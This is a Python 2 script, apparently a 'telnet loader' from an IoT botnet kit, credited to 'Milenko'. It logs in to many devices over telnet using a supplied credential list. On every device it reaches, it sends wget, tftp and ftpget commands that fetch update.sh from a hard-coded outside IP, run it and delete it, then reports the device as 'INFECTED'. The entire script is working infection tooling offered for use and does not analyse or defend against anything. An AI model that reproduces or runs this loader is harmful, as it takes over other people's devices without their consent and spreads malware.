#!/usr/bin/python#Phaaaat hax telnet loader by Milenkoimport sys, re, os,

1. #!/usr/bin/python
2. #Phaaaat hax telnet loader by Milenko
3.  
4. import sys, re, os, socket, time, select
5. from threading import Thread
6. from time import sleep
7.  
8. if len(sys.argv) < 2:
9. sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
10.  
11. wget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.196/update.sh -O update.sh; busybox wget http://185.10.68.196/update.sh -O update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #wget command to send
12. tftp = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r update.sh -g 185.10.68.196; busybox tftp -r update.sh -g 185.10.68.196; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #tftp command to send
13. ftpget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh"
14.  
15. print "\033[31m"
16.  
17. print "S-S-SUUUPER fast telnet loader by Milenko"
18. print
19. #simply find and replace newlines to :: then a newline so every IP starts with ::. It will scan those for port 22 or whatever your skiddie heart desires </3
20. print "Reads ip:port user:pass and simply checks the IP for port 23."
21. print "Then sends the infect to it and saves the working telnets to \"working.txt\""
22. print "It is VERY fast and extremely efficient."
23. print "As it splits the file into equal chunks for each thread!"
24.  
25. threads = int(raw_input("Threads: "))
26.  
27. lines = open(sys.argv[1],"r").readlines()
28.  
29. global fh
30. fh = open("workingtelnet.txt","a+")
31.  
32. def chunkify(lst,n):
33. return [ lst[i::n] for i in xrange(n) ]
34.  
35. running = 0
36.  
37. global loaded
38. loaded = 0
39. global rekt
40. rekt = []
41.  
42. def printStatus():
43. global loaded
44. while 1:
45. sleep(30)
46. print "\033[32m[\033[31m+\033[32m] Total eye pees loaded: " + str(loaded) + "\033[37m"
47. if loaded >= 1000:
48. print "Dayum u got sum phat hax brah :^}"
49.  
50.  
51. def readUntil(tn, advances, timeout=8):
52. buf = ''
53. start_time = time.time()
54. while time.time() - start_time < timeout:
55. buf += tn.recv(1024)
56. time.sleep(0.1)
57. for advance in advances:
58. if advance in buf: return buf
59. return ""
60.  
61. def recvTimeout(sock, size, timeout=8):
62. sock.setblocking(0)
63. ready = select.select([sock], [], [], timeout)
64. if ready[0]:
65. data = sock.recv(size)
66. return data
67. return ""
68.  
69. def contains(data, array):
70. for test in array:
71. if test in data:
72. return True
73. return False
74.  
75. def infect(ip,username,password):
76. global rekdevice
77. global rekt
78. global loaded
79. global fh
80. try:
81. tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
82. tn.settimeout(1)
83. tn.connect((ip, 23))
84. hoho = ''
85. hoho += readUntil(tn, ":")
86. if ":" in hoho:
87. tn.send(username + "\r\n")
88. time.sleep(0.2)
89. else:
90. return
91. hoho = ''
92. hoho += readUntil(tn, ":")
93. if ":" in hoho:
94. tn.send(password + "\r\n")
95. time.sleep(0.2)
96. prompt = ''
97. prompt += recvTimeout(tn, 40960)
98. if "#" in prompt or "$" in prompt or "~" in prompt or ">" in prompt or "root@" in prompt:
99. try:
100. tn.send("ls /\r\n")
101. time.sleep(1)
102. timeout = 8
103. buf = ''
104. start_time = time.time()
105. while time.time() - start_time < timeout:
106. buf += recvTimeout(tn, 40960)
107. time.sleep(0.1)
108. if "tmp" in buf and "unrecognized" not in buf:
109. tn.send(wget + "\r\n")
110. time.sleep(8)
111. tn.send(tftp + "\r\n")
112. time.sleep(8)
113. tn.send(ftpget + "\r\n")
114. time.sleep(8)
115. print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
116. tn.close()
117. return
118. except:
119. tn.close()
120. else:
121. #auth failed
122. tn.close()
123. except Exception as e:
124. tn.close()
125.  
126. def check(chunk, fh):
127. global running
128. global rekt
129. running += 1
130. threadID = running
131. for login in chunk:
132. try:
133. if login.split(":")[0] in rekt:
134. continue
135. if ":23 " in login:
136. login = login.replace(":23 ", ":")
137. if ":2323 " in login:
138. login = login.replace(":2323 ", ":")
139. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
140. s.settimeout(0.5)
141. s.connect((login.split(":")[0], 23))
142. s.close()
143. infect(login.split(":")[0], login.split(":")[1], login.split(":")[2])
144. except:
145. pass
146. print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs. Loaded: " + str(loaded)
147. running -= 1
148.  
149. lines = map(lambda s: s.strip(), lines) # remove all newlines
150.  
151. chunks = chunkify(lines, threads) # make seperate chunk for each thread
152.  
153. print "STARTING SCAN AND LOAD!!!"
154.  
155. Thread(target = printStatus, args = ()).start()
156.  
157. for thread in xrange(0,threads):
158. if thread >= 384:
159. sleep(0.2)
160. try:
161. Thread(target = check, args = (chunks[thread], fh,)).start()
162. except:
163. pass
164. print "Scanning... Press enter 3 times to stop."
165.  
166. for i in range(0,3):
167. raw_input()
168.  
169. fh.close()
170.  
171. os.kill(os.getpid(), 9)